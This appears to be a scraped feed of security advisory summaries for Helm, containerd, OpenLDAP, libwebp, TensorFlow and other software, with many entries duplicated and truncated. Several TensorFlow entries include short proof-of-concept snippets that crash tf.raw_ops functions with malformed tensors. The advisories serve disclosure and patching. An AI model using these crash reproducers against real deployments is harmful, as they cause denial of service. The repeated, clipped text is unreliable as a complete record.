Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Uncontrolled Search Path Element

cloudflared versions prior to 2020.8.1 contain a local privilege escalation vulnerability on Windows systems. When run on a Windows system, cloudflared searches for configuration files which could be abused by a malicious entity to execute commands as a privileged user. Version 2020.8.1 fixes this issue.

Signature Validation Bypass

Impact Given a valid SAML Response, an attacker can potentially modify the document, bypassing signature validation in order to pass off the altered document as a signed one. This enables a variety of attacks, including users accessing accounts other than the one to which they authenticated in the identity provider, or full authentication bypass if an external attacker can obtain an expired, signed SAML Response. Patches A patch is available, …

Reachable Assertion

A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed by OpenLDAP’s slapd server, to trigger an assertion failure. The highest threat from this vulnerability is to system availability.

NULL Pointer Dereference

In teler before version 0.0.1, if you run teler inside a Docker container and encounter errors.Exit function, it will cause denial-of-service (SIGSEGV) because it does not get process ID and process group ID of teler properly to kills. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.

NULL Pointer Dereference

In teler before version 0.0.1, if you run teler inside a Docker container and encounter errors.Exit function, it will cause denial-of-service (SIGSEGV) because it doesn't get process ID and process group ID of teler properly to kills. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.

Information Exposure

Keystone 5 is an open source CMS platform to build Node.js applications. This security advisory relates to a newly discovered capability in our query infrastructure to directly or indirectly expose the values of private fields, bypassing the configured access control.

Incorrect Resource Transfer Between Spheres

containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in …

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm –help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm –help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm –help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within unsquashfs, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesystem. The extraction occurs automatically for unprivileged (either installation or with allow setuid = no) run of Singularity when a user attempt to …

Improper Handling of Exceptional Conditions

In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this for her advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0

Improper Handling of Exceptional Conditions

In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this for her advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0

Cross-site Scripting

A reflected cross-site scripting (XSS) vulnerability in Shopizer allows remote attackers to inject arbitrary web script or HTML via the ref parameter to a page about an arbitrary product, e.g., a product/insert-product-name-here.html/ref= URL.

Command Injection

The @ronomon/opened library is vulnerable to a command injection vulnerability which would allow a remote attacker to execute commands on the system if the library was used with untrusted input.

accounts: Hash account number using Salt

@alovak found that currently when we build hash of account number we do not "salt" it. Which makes it vulnerable to rainbow table attack. What did you expect to see? I expected salt (some random number from configuration) to be used in hash.AccountNumber I would generate salt per tenant at least (maybe per organization).

Use After Free

A use-after-free was found due to a thread being killed too early. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Stack overflow due to looping TFLite subgraph

TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.

Stack overflow due to looping TFLite subgraph

TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.

Stack overflow due to looping TFLite subgraph

TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.

Session operations in eager mode lead to null pointer dereferences

In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be

A security-sensitive bug was discovered by Open Source Developer Erik Sundell of Sundell Open Source Consulting AB. The functions RandomAlphaNumeric(int) and CryptoRandomAlphaNumeric(int) are not as random as they should be. Small values of int in the functions above will return a smaller subset of results than they should. For example, RandomAlphaNumeric(1) will always return a digit in the 0-9 range, while RandomAlphaNumeric(4) will return around ~7 million of the ~13M …

Path Traversal

Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

Out-of-bounds Write

A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Out-of-bounds Read

An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability.

Out-of-bounds Read

An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability.

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference via invalid Ragged Tensors

